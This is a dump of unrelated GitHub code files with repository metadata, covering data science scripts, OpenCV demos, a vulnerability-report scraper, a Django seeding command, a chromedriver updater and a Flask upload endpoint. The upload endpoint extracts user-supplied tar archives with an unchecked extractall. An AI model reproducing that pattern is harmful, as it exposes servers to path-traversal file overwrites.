logging.info(f\"Waiting {ENV_VARS.DDNS_UPDATE_FREQ} seconds till next check.\")\n        sleep(ENV_VARS.DDNS_UPDATE_FREQ)\n\nif __name__ == \"__main__\":\n    set_dns()\n    if ENV_VARS.DELETE_ACME_RECORDS:\n        sleep(ENV_VARS.DELETE_ACME_RECORDS_WAIT)  # Wait X seconds for acme challenges to have been completed\n        delete_acme_records()  # Delete acme challenge records\n    ddns_loop()  # Start the DDNS IP update loop\n","repo_name":"MikeFez/SWAG-Cloudflare-DNS-Manager","sub_path":"swag_cloudflare_dns_manager/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7614989534","text":"import os\nimport pandas as pd\nfrom pandas.tseries.offsets import BMonthEnd\nfrom datetime import datetime\nfrom Data.ET.Common_Data import BalanceSheet_Param_Dict\n\nCSV_File = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'Stock_Analysis_BalanceSheet.csv')\n# C:\\\\Users\\\\nandpara\\\\PycharmProjects\\\\Machine_Learning1\\\\Stock_Analysis_BalanceSheet.csv\nprint (CSV_File)\n\ndf = pd.DataFrame.from_csv(path = CSV_File)\nCol = []  # Columns only available for That Stock\ndf = df.loc[['HDFC']].dropna(axis='columns')\n# print (df)\nfor column in df.columns:\n    Col.append(column)\n\nNew_DF = pd.DataFrame()\n# print (Col)\nSorted_List = sorted(set([q[:6] for q in sorted(Col)]))\nprint (Sorted_List)\nCol_Diff = []\nfor i in range(len(Sorted_List)-1):\n    Mon = Sorted_List[i][:3]  # Mar_\n    L_Year = Sorted_List[i][4:6]  # 15\n    h = Sorted_List[i+1]\n    H_Year = h[4:6]\n    for attr in BalanceSheet_Param_Dict.values():\n        New_attr = Mon+\"_\"+L_Year+\"_\"+H_Year+\"_\"+attr+\"_PChg\"\n        L_Column = Mon+\"_\"+L_Year+\"_\"+attr\n        H_Column = Mon+\"_\"+H_Year+\"_\"+attr\n        # print(L_Column , H_Column)\n        Col_Diff.append(New_attr)\n        df[New_attr] = ((df[H_Column] - 
df[L_Column])/df[L_Column]) * 100\n continue\n\n# for j in Col_Diff:\n# print(j)\n\n# for i in df[['Mar_14_Share_Capital','Mar_15_Share_Capital', 'Mar_14_15_Share_Capital_PChg']]:\n# print(i)\nprint(df['Mar_14_Share_Capital'])\nprint(df['Mar_15_Share_Capital'])\nprint(df['Mar_14_15_Share_Capital_PChg'])\n\nfor j in df.columns:\n print(j)\n\n# dt = datetime(2017, 9, 12)\n# offset = BMonthEnd()\n# T = offset.rollforward(dt)\n# print(type(T), T)","repo_name":"NandaCj/Machine_Learning1","sub_path":"Pandas_Practice/Creating_Df_From_Csv.py","file_name":"Creating_Df_From_Csv.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"32613121875","text":"#!/usr/bin/env python\n\nimport time\nimport cv2\nimport numpy as np\nimport csv\nimport os\nimport sys\nimport shutil\n\nfrom crawl_color import color_table\nfrom color_transfer import classify_table\n\ndef img_2_paint(img):\n img = cv2.imread(img)\n # shape = (217, 403, 3) -> 21.7 cm, 40.3 cm, rgb 3 colors\n shape = img.shape\n new_shape = (int(shape[0]/10), int(shape[1]/10), 3)\n print (new_shape)\n new_img = np.zeros(new_shape)\n tmp_total_r = 0\n tmp_total_g = 0\n tmp_total_b = 0\n for i in range(0, new_shape[0]):\n for j in range(0, new_shape[1]):\n for w in range(0, 10):\n for h in range(0, 10):\n tmp_total_r += img[i*10+w, j*10+h, 0]\n tmp_total_g += img[i*10+w, j*10+h, 1]\n tmp_total_b += img[i*10+w, j*10+h, 2]\n tmp_total_r = int(tmp_total_r / 100)\n tmp_total_g = int(tmp_total_g / 100)\n tmp_total_b = int(tmp_total_b / 100)\n new_img[i, j, 0] = tmp_total_r\n new_img[i, j, 1] = tmp_total_g\n new_img[i, j, 2] = tmp_total_b\n savename = \"./test/painting.png\"\n cv2.imwrite(savename, new_img)\n print (\"finished\")\n print (\"shape: \", new_img.shape)\n return (new_img)\n\ndef compare_color(img, bl_table, r_table, g_table, b_table):\n new_img = img.copy()\n #print (new_img[10, 10])\n shape = img.shape\n bl_len = len(bl_table)\n r_len = len(r_table)\n g_len = len(g_table)\n b_len = len(b_table)\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n tmp_color = (img[x, y, 2], img[x, y, 1], img[x, y, 0]) #(b, g, r)\n #print (tmp_color)\n if (tmp_color[0] == tmp_color[1] == tmp_color[2]):\n dev_list = []\n for i in range(0, bl_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - bl_table[i][p])*abs(tmp_color[p] - bl_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (bl_table[dev_index][0], bl_table[dev_index][1], bl_table[dev_index][2])\n \n else:\n tmp_max = max(tmp_color)\n tmp_index = int(tmp_color.index(tmp_max))\n #print (\"tmp index: \", tmp_index)\n if (tmp_index == 2): #b\n dev_list = []\n for i in range(0, b_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - b_table[i][p])*abs(tmp_color[p] - b_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (b_table[dev_index][0], b_table[dev_index][1], b_table[dev_index][2])\n #print (\"dev list: \", dev_list)\n elif (tmp_index == 1): #g\n dev_list = []\n for i in range(0, g_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - g_table[i][p])*abs(tmp_color[p] - g_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (g_table[dev_index][0], g_table[dev_index][1], g_table[dev_index][2])\n else:\n dev_list = []\n for i in range(0, r_len):\n dev = 0\n for p in 
range(0, 3):\n dev += (abs(tmp_color[p] - r_table[i][p])*abs(tmp_color[p] - r_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (r_table[dev_index][2], r_table[dev_index][1], r_table[dev_index][0])\n new_img[x, y, 0], new_img[x, y, 1], new_img[x, y, 2] = new_color[0], new_color[1], new_color[2]\n\n save_name = \"./test/final.png\"\n cv2.imwrite(save_name, new_img)\n\ndef takeFour(elem):\n return elem[3]\n\ndef paint_2_csv(img):\n img = cv2.imread(img)\n shape = img.shape\n print (\"painting shape: \", shape)\n color_r = []\n color_g = []\n color_b = []\n total_color = []\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n tmp_list = []\n tmp_total = 0\n tmp_color = img[x, y]\n tmp_r = int(tmp_color[0])\n tmp_g = int(tmp_color[1])\n tmp_b = int(tmp_color[2])\n tmp_total = tmp_r + tmp_g + tmp_b\n tmp_list.append(tmp_r)\n tmp_list.append(tmp_g)\n tmp_list.append(tmp_b)\n tmp_list.append(tmp_total)\n if (tmp_r not in color_r):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n if (tmp_g not in color_g):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n if (tmp_b not in color_b):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n index_r = int(color_r.index(tmp_r))\n index_g = int(color_g.index(tmp_g))\n index_b = int(color_b.index(tmp_b))\n if (index_r == index_g == index_b):\n pass\n else:\n if ((color_r[index_r] == tmp_r) and (color_g[index_r] == tmp_g) \\\n and (color_b[index_r] == tmp_b)):\n pass\n elif ((color_r[index_g] == tmp_r) and (color_g[index_g] == tmp_g) \\\n and (color_b[index_g] == tmp_b)):\n pass\n elif ((color_r[index_b] == tmp_r) and (color_g[index_b] == tmp_g) \\\n and (color_b[index_b] == tmp_b)):\n pass\n else:\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n \n # if ()\n # (color_r[index_r] == color_g[index_b]) or \\\n # (color_r[index_b] == color_g[index_g])):\n\n #color_r.append(tmp_r)\n #color_g.append(tmp_g)\n #color_b.append(tmp_b)\n #total_color.append(tmp_list)\n total_number = len(color_r)\n total_color.sort(key=takeFour)\n \n print (\"total color number: \", total_number)\n print (\"first color: \", total_color[1])\n print (\"second color: \", total_color[2])\n\n\n\n \n path = \"./painting\"\n try:\n if os.path.exists('./painting'):\n shutil.rmtree(path)\n os.mkdir(path)\n except:\n print (\"dir exist\")\n \n for i in range(0, total_number):\n name = path + \"/\" + str(i) + \".csv\"\n color_r = total_color[i][0]\n color_g = total_color[i][1]\n color_b = total_color[i][2]\n with open(name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n writer.writerow([color_r, color_g, color_b])\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n if ((img[x, y, 0] == color_r) and (img[x, y, 1] == color_g) and \\\n (img[x, y, 2] == color_b)):\n writer.writerow([x, y])\n\n \n \"\"\"\n name = \"painting1.csv\"\n # name = path + \"painting1.csv\"\n with open(name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n writer.writerow(['Spam'] * 5 + ['Baked Beans'])\n writer.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam']) \n \"\"\"\nif __name__ == \"__main__\":\n np_color_table = color_table()\n size = np_color_table.shape\n bl_table, r_table, g_table, b_table = classify_table(np_color_table)\n\n new_img = 
img_2_paint(\"./test/bgr_object.png\")\n compare_color(new_img, bl_table, r_table, g_table, b_table)\n\n paint_2_csv(\"./test/final.png\")","repo_name":"applejenny66/snoopy","sub_path":"gen_point.py","file_name":"gen_point.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33591230179","text":"from PySide import QtGui\n'''\n\ncreates a widget that has a frame with a \\\ntitled label around your contents\n\ndiffers from QLabel by accepting both widgets and contents\n\n'''\nclass LabelWidget(QtGui.QGroupBox):\n def __init__(self,label,contents=None):\n QtGui.QGroupBox.__init__(self,label)\n if isinstance(contents,QtGui.QLayout):\n self.setLayout(contents)\n elif isinstance(contents,QtGui.QWidget):\n l = QtGui.QVBoxLayout()\n l.addWidget(contents)\n self.setLayout(l)\n","repo_name":"creilly/sitzlabexpcontrol","sub_path":"qtutils/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"34251802719","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets as skds\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n# Create dummy data\nX, y = skds.make_regression(n_samples=200, n_features=1, n_informative=1, n_targets=1, noise=20.0) # 200 samples, each for the targer (yi) and predictor (Xi)\n\n# Reshape numpy array to have 2 dimensions\nif (y.ndim == 1):\n y = y.reshape(len(y), 1)\n\n# Plotting\nplt.figure(figsize=(7, 4))\nplt.plot(X, y, '.b')\nplt.show()\n\n\n# Split the data into training and testing datasets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=123) # set aside 30% dataset for testing\n\n# Defining inputs, parameters and other variables\nnum_outputs = y_train.shape[1] # One response variable\nnum_inputs = X_train.shape[1] # One predictor variable\n\n# Define eqn: y = W*x + b\n# Use placeholders\ntf.compat.v1.disable_eager_execution() # tf.compat.v1 is the compatible api version with the specific methods\n\nx_tensor = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, num_inputs], name='x')\ny_tensor = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, num_outputs], name='y')\nw = tf.Variable(tf.zeros([num_inputs, num_outputs]), dtype=tf.float32, name='w')\nb = tf.Variable(tf.zeros([num_outputs]), dtype=tf.float32, name='b')\n\nmodel = tf.matmul(x_tensor, w) + b\n\n# Defining the loss funtion\n# Mean squared error/ residuals (MSE)\n# residual = (Y)predict - (Y)actual; residual = model - ytensor\nloss = tf.reduce_mean(tf.square(model - y_tensor)) # Mean squared arror \n\n# Compute MSE and R2\nmse = loss\ny_mean = tf.reduce_mean(y_tensor)\ntotal_error = tf.reduce_sum(tf.square(y_tensor - y_mean))\nunexplained_error = tf.reduce_sum(tf.square(y_tensor-model))\nrsq = 1 - tf.divide(unexplained_error, total_error) # R2 = 1 - unexplained error / total error, signifies the goodness of fit\n\n \n# Define optimizer function\nlearning_rate = 0.001\noptimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss=loss)\n# Gradient descent is an algorithm that minimizes functions (loss funtion in this example)\n# learning rate is the step size we take per iteration towards the solution\n\n# Train the model\nnum_epochs = 1800 # number of iterations to run the training\n\n# w_hat and b_hat: estimates of w and b\nw_hat = 
0\nb_hat = 0\n\nloss_epochs = np.empty(shape=[num_epochs], dtype=float)\nmse_epochs = np.empty(shape=[num_epochs], dtype=float)\nrs_epochs = np.empty(shape=[num_epochs], dtype=float)\n\n#initial values\nmse_score = 0\nrsq_score = 0\n\nwith tf.compat.v1.Session() as tfs:\n tfs.run(tf.compat.v1.global_variables_initializer()) # run optimizer / loop on training data\n for epoch in range(num_epochs):\n feed_dict = {x_tensor: X_train, y_tensor: y_train}\n loss_val, _ = tfs.run([loss, optimizer], feed_dict=feed_dict)\n loss_epochs[epoch] = loss_val # calculate and store error\n feed_dict = {x_tensor: X_test, y_tensor: y_test}\n mse_score, rsq_score = tfs.run([mse, rsq], feed_dict=feed_dict)\n mse_epochs[epoch] = mse_score\n rs_epochs[epoch] = rsq_score\n\n w_hat, b_hat = tfs.run([w, b]) # final values of w and b obtained after all iterations\n w_hat = w_hat.reshape(1)\n\nprint('model: Y = {0:.8f} X + {1:.8f}'.format(w_hat[0], b_hat[0]))\nprint('For test data: MSE = {0:.8f}, R2 = {1:.8f}'.format(mse_score, rsq_score))\n\n# Visualization of the resulting linear regression fit\nplt.figure(figsize=(14, 8))\nplt.title('Original data and trained model')\n\nx_plot = [np.min(X) - 1, np.max(X) + 1] # Range of X values\ny_plot = w_hat * x_plot + b_hat # w_hat and b_hat predicted before\nplt.axis([x_plot[0], x_plot[1], y_plot[0], y_plot[1]])\nplt.plot(X, y, '.b', label='Original Data')\nplt.plot(x_plot, y_plot, 'r-', label='Trained Model')\nplt.legend()\nplt.show()\n\n# plot loss and mse with epochs\nplt.figure(figsize=(14, 8))\nplt.axis([0, num_epochs, 0, np.max(loss_epochs)])\nplt.title('Loss in Iterations')\nplt.xlabel('# Epoch')\nplt.ylabel('# MSE')\nplt.plot(loss_epochs, label='Loss on X_train') # training loss per epoch\n\nplt.axis([0, num_epochs, 0, np.max(mse_epochs)])\nplt.plot(mse_epochs, label='MSE on X_test')\nplt.xlabel('# Epoch')\nplt.ylabel('MSE')\nplt.legend()\nplt.show()","repo_name":"nishantp-home/Masters-DataSciences","sub_path":"TensorFlowAndKerasForDataScience/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"10673796528","text":"import cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv.imread('Photos/cats.jpg')\r\n\r\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\ncv.imshow(\"Gray\",gray)\r\n\r\n# Grayscale Histogram\r\n\r\nhistogram = cv.calcHist([gray], [0], None, [256],[0,256])\r\n\r\nplt.figure()\r\nplt.title('Grayscale Histogram')\r\nplt.xlabel('Bins')\r\nplt.ylabel('# of pixels ')\r\nplt.plot(histogram)\r\nplt.xlim([0,256])\r\nplt.show()\r\n\r\n\r\n\r\ncv.waitKey(0)","repo_name":"YusufBerkSaridogan/Python-OpenCV","sub_path":"Basic/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
{"seq_id":"18135504143","text":"from playwright.sync_api import Page, expect\n\n\ndef login(page: Page):\n \"\"\"\n Log in to the site\n \"\"\"\n page.goto(\"http://localhost:5000/login\")\n\n page.locator(\"#userEmail\").fill(\"test@example.com\")\n page.locator(\"#userPassword\").fill(\"test\")\n page.locator(\"button[value=login]\").click()\n\n expect(page.get_by_text(\"Clock In\")).to_be_attached()\n\n\ndef open_menu_and_click(text: str, page: Page):\n \"\"\"\n Open the navigation menu and click the item with the given text\n \"\"\"\n menu = page.locator(\"#menu\")\n menu.locator(\"li > a\").first.click()\n menu.get_by_text(text).click()\n\n\ndef execute_sql(statements: list[str]):\n 
\"\"\"\n Execute a list of SQL statements\n Useful for test set up and teardown\n \"\"\"\n from sqlalchemy import text\n\n from app import create_app, db\n\n app = create_app(test_mode=True)\n\n with app.app_context(), app.test_request_context():\n conn = db.engine.connect()\n\n for statement in statements:\n conn.execute(text(statement))\n conn.execute(text(\"COMMIT\"))\n conn.close()\n","repo_name":"danstewart/log-my-time","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11610562211","text":"import cv2\nimport urllib\nimport os\nimport pdb\nimport numpy as np\n\nsnap = os.environ[\"SNAP\"]\nface_cascade = cv2.CascadeClassifier(snap + '/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml')\neyes_cascade = cv2.CascadeClassifier(snap + '/usr/share/opencv4/haarcascades/haarcascade_eye.xml')\n\nclass VideoCamera(object):\n def __init__(self):\n # Using OpenCV to capture from device 0. If you have trouble capturing\n # from a webcam, comment the line below out and use a video file\n # instead.\n #self.video = urllib.urlopen('http://192.168.10.12:8080/video') #cv2.VideoCapture(0)\n self.video = cv2.VideoCapture(0)\n self.video.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n self.video.set(cv2.CAP_PROP_FRAME_HEIGHT, 360)\n # If you decide to use video.mp4, you must have this file in the folder\n # as the main.py.\n # self.video = cv2.VideoCapture('video.mp4')\n\n def __del__(self):\n self.video.release()\n\n def detect_eyes(self, gray, frame):\n \"\"\" Input = greyscale image or frame from video stream\n Output = Image with rectangle boxes around eyes and face\n \"\"\"\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (32, 84, 233), 2)\n\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n\n eyes = eyes_cascade.detectMultiScale(roi_gray, 1.1, 3)\n\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (111, 33, 119), 2)\n #cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n\n return frame\n\n def detect_faces(self, gray, frame):\n \"\"\" Input = greyscale image or frame from video stream\n Output = Image with rectangle box in the face\n \"\"\"\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (32, 84, 233), 2)\n\n return frame\n\n def get_frame(self):\n success, image = self.video.read()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n canvas = self.detect_eyes(gray, image)\n\n ret, jpeg = cv2.imencode('.jpg', image)\n return jpeg.tobytes()\n","repo_name":"ogra1/opencv-html-demo","sub_path":"demos/bin/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23246280876","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nfrom json.tool import main\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport openpyxl # 2022.05.10 ADD\r\nimport datetime\r\n\r\nimport sqlite3 # 2022.05.16 UPDATE\r\n\r\ndef main():\r\n\r\n today = datetime.date.today()\r\n yyyymmdd = today.strftime('%Y%m%d')\r\n\r\n wb = openpyxl.load_workbook('c:/Python/test/sp.xlsx') # 2022.05.10 UPDATE\r\n\r\n try:\r\n wb.remove_sheet(wb.get_sheet_by_name(yyyymmdd)) \r\n except:\r\n pass\r\n \r\n wb.create_sheet(index=0, 
title=yyyymmdd)\r\n    wb.save('c:/Python/test/sp.xlsx')\r\n\r\n    sheet = wb[yyyymmdd]\r\n\r\n    db_path = \"c:\Python\SQLite\jvn.db\" # 2022.05.16 UPDATE\r\n    conn = sqlite3.connect(db_path) # 2022.05.16 UPDATE\r\n    cur = conn.cursor()\r\n\r\n    gets = requests.get('http://jvn.jp/report')\r\n\r\n\r\n    soup = BeautifulSoup(gets.text, 'html.parser')\r\n\r\n\r\n    airs = []\r\n\r\n    for tag in soup.find_all('dt'):\r\n        airs.append(tag.text)\r\n    \r\n    i = 1\r\n    for air in airs:\r\n\r\n        work = air.strip()\r\n        wk = work.replace(' ', '') \r\n        sheet.cell(row=i, column=1, value=wk[0:10])\r\n        sheet.cell(row=i, column=2, value=wk[10:].replace(':', ''))\r\n        # print(wk[10:15])\r\n        if str(wk[10:15]) == \"JVNVU\":\r\n            urls = \"http://jvn.jp/vu/\" + wk[10:].replace(':', '').replace('#', '') + \"/index.html\"\r\n        else:\r\n            urls = \"http://jvn.jp/jp/\" + wk[10:].replace(':', '').replace('#', '') + \"/index.html\"\r\n        sheet.cell(row=i, column=3, value=urls)\r\n\r\n        # ADD 2022.05.16 --- START\r\n        jvndate = wk[0:10]\r\n        jvncode = wk[10:].replace(':', '')\r\n        jvnurl = urls\r\n\r\n        ### sql = 'INSERT INTO JVN (JVNCODE, JVNDATE, JVNURL) values (?,?,?)'\r\n        sql = 'INSERT INTO JVN (JVNCODE, JVNDATE, JVNURL) values (?,?,?) ON CONFLICT DO NOTHING'\r\n        # print(jvncode)\r\n        # print(jvndate)\r\n        # print(jvnurl)\r\n        data = [jvncode, jvndate, jvnurl]\r\n        cur.execute(sql, data)\r\n        # ADD 2022.05.16 --- END\r\n\r\n        i = i + 1\r\n\r\n    wb.save('c:/Python/test/sp.xlsx')\r\n\r\n    conn.commit() # 2022.05.16 UPDATE\r\n    conn.close() # 2022.05.16 UPDATE\r\n\r\nmain() # 2022.05.10 UPDATE","repo_name":"Munenobu-Nakabayashi/Scraping","sub_path":"spRev3.py","file_name":"spRev3.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"32292640655","text":"from django.core.management.base import BaseCommand, CommandError\nfrom hds.models import Gate, Channel, Center\nfrom django.db import transaction\n\nclass Command(BaseCommand):\n help = 'Populate with initial data'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--delete',\n action='store_true',\n dest='delete',\n help='Delete the initial data instead of creating it',\n )\n\n \n def handle(self, *args, **options):\n if options['delete']:\n \n print(Gate.objects.all().delete())\n print(Channel.objects.all().delete())\n print(Center.objects.all().delete())\n print(\"All deleted\")\n else:\n self.create_gates()\n self.create_channels()\n self.create_centers()\n \n \n \n @transaction.atomic\n def create_gates(self):\n for g in Gate.GATES:\n number, name = g\n gate, created = Gate.objects.get_or_create(number=number, name=name)\n gate.save()\n print(gate)\n \n \n @transaction.atomic\n def create_channels(self):\n for channel in Channel.CHANNELS:\n # e.g. channel = ((1, 8), 'Inspiration', 'A creative Role Model', 'Individual', ...)\n gates, name, title, circuit_group, circuit = channel\n g1, g2 = gates\n gate1 = Gate.objects.get(number=g1)\n gate2 = Gate.objects.get(number=g2)\n channel, created = Channel.objects.get_or_create(gate1=gate1, gate2=gate2, name=name, title=title, circuit_group=circuit_group, circuit=circuit)\n channel.save()\n print(channel)\n \n @transaction.atomic\n def create_centers(self):\n for center in Center.CENTERS:\n center_slug, center_gates = center\n name = center_slug.replace('_',' ').replace('-',' ').title()\n center, created = Center.objects.get_or_create(slug=center_slug, name=name)\n center.save()\n center.gates.set(Gate.objects.filter(number__in=center_gates))\n print(center)\n 
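# Usage sketch (assumes the conventional Django layout implied by the file name below, i.e. <app>/management/commands/hds_initial.py; Django derives the command name from the module name):\n#\n# python manage.py hds_initial # create the Gate, Channel and Center rows\n# python manage.py hds_initial --delete # delete those rows instead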
\n","repo_name":"felipe-a-holanda/darpan-astro","sub_path":"darpan/hds/management/commands/hds_initial.py","file_name":"hds_initial.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29306385669","text":"from get_chrome_version import get_chrome_version\nfrom bs4 import BeautifulSoup\nimport requests\nimport difflib\nimport zipfile\nimport json\nimport wget\nimport os\n\n\ndef loadConfig(): \n return json.load(open('config.json'))\n\ndef getAllChomeVersion():\n url = \"https://chromedriver.chromium.org/downloads\"\n req = requests.get(url)\n soup = BeautifulSoup(req.content, 'html.parser')\n\n versions = []\n\n for a in soup.find_all('a', href=True):\n if a['href'].startswith('https://chromedriver.storage.googleapis'):\n if a['href'].endswith('notes.txt'):\n pass\n else:\n version = (a['href'].split('?')[1].split('=')[1])[:-1]\n\n currentDict = [version, a['href']]\n versions.append(currentDict)\n return versions\n\n\ndef checkChromeVersion():\n chromeVersion = get_chrome_version()\n \n versionList = []\n for version in getAllChomeVersion():\n if version[0] not in versionList:\n versionList.append(version[0])\n\n try:\n return difflib.get_close_matches(chromeVersion, versionList)[0]\n except Exception as e:\n print(\"Google Chrome path not found!\")\n exit()\n\n\ndef downloadVersion(downloadVersion = checkChromeVersion()):\n fileLink = f'https://chromedriver.storage.googleapis.com/{downloadVersion}/chromedriver_win32.zip'\n wget.download(fileLink)\n\ndef extractZip():\n with zipfile.ZipFile('chromedriver_win32.zip', 'r') as zip_ref:\n zip_ref.extractall(loadConfig()['path'])\n\ndef deleteZip():\n for item in os.listdir(os.getcwd()):\n if item.endswith(\".zip\"):\n os.remove(os.path.join(os.getcwd(), item))\n\ndownloadVersion()\nextractZip()\ndeleteZip()\nloadConfig()\n\n\n","repo_name":"Xehia/ChromeDriver-Updater","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20451456952","text":"class Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def output(self):\n node = self\n while node is not None:\n print(node.val)\n node = node.next\n\n def deleteMiddleNode(self, n):\n node = self\n previous = Node(0)\n while node is not None:\n if n == node.val and node.next is not None:\n previous.next = node.next\n else:\n previous = node\n node = node.next\n\nnode1 = Node(1)\nnode2 = Node(2)\nnode3 = Node(3)\nnode4 = Node(4)\nnode5 = Node(5)\nnode6 = Node(6)\nnode7 = Node(7)\n\nnode1.next = node2\nnode2.next = node3\nnode3.next = node4\nnode4.next = node5\nnode5.next = node6\nnode6.next = node7\n\nnode1.deleteMiddleNode(4)\nnode1.output()\n\n\n","repo_name":"hkwan003/Cracking-the-Coding-Interview","sub_path":"2. 
Linked Lists/2.3 Delete Middle Node.py","file_name":"2.3 Delete Middle Node.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3007151275","text":"#!/usr/bin/env python3\n\n\"\"\"\nBASICS\n\nSubstitutes the current content for a user for new content\n\"\"\"\n\n\nimport os, shutil\nfrom flask import Flask, send_file, request, jsonify\nimport base_functions as bf\nfrom werkzeug.utils import secure_filename\nimport tarfile\n\n\n\napp = Flask(__name__)\nGREYFISH_FOLDER = os.environ['greyfish_path']+\"/sandbox/\"\n\n\n\n@app.route(\"/grey/push_all//\", methods=['POST'])\ndef push_all(toktok, gkey):\n\n IP_addr = request.environ['REMOTE_ADDR']\n if not bf.valid_key(gkey, toktok):\n return \"INVALID key\"\n if str('DIR_'+toktok) not in os.listdir(GREYFISH_FOLDER):\n return 'INVALID, User directory does not exist'\n\n try:\n file = request.files['file']\n except:\n return \"No file uploaded\"\n\n fnam = file.filename\n\n # Avoids empty filenames and those with commas\n if fnam == '':\n return 'INVALID, no file uploaded'\n\n USER_DIR = GREYFISH_FOLDER+'DIR_'+str(toktok)+'/'\n new_name = secure_filename(fnam)\n\n\n # Must be a valid tar file\n try:\n file.save(USER_DIR + new_name)\n tar = tarfile.open(USER_DIR+new_name)\n tar.getmembers()\n except:\n os.remove(USER_DIR+new_name)\n return \"Tar file cannot be opened, must be .tgz or .tar.gz\"\n\n\n\n user_data = [USER_DIR+x for x in os.listdir(USER_DIR) if x != fnam]\n\n # Deletes all current data and untars the new files\n for content in user_data:\n\n if os.path.isdir(content):\n shutil.rmtree(content)\n continue\n os.remove(content)\n\n tar.extractall(USER_DIR)\n tar.close()\n os.remove(USER_DIR+new_name)\n\n return 'User contents updated in Greyfish'\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ritua2/gib_express","sub_path":"middle-layer/greyfish_storage/push_all.py","file_name":"push_all.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"42324398480","text":"import sys\ndef main():\n captcha = open(sys.argv[1], 'r').readline().strip()\n\n #result = compute_captcha(captcha)\n result = compute_captcha2(captcha)\n print(result)\n\ndef get_halfway(captcha):\n halves = []\n \n half = len(captcha) / 2\n for x in range(len(captcha)):\n num = captcha[x]\n ind = int(x + half)\n if ind > len(captcha) - 1:\n ind = ind - len(captcha)\n if num == captcha[ind]:\n halves.append(num)\n\n return 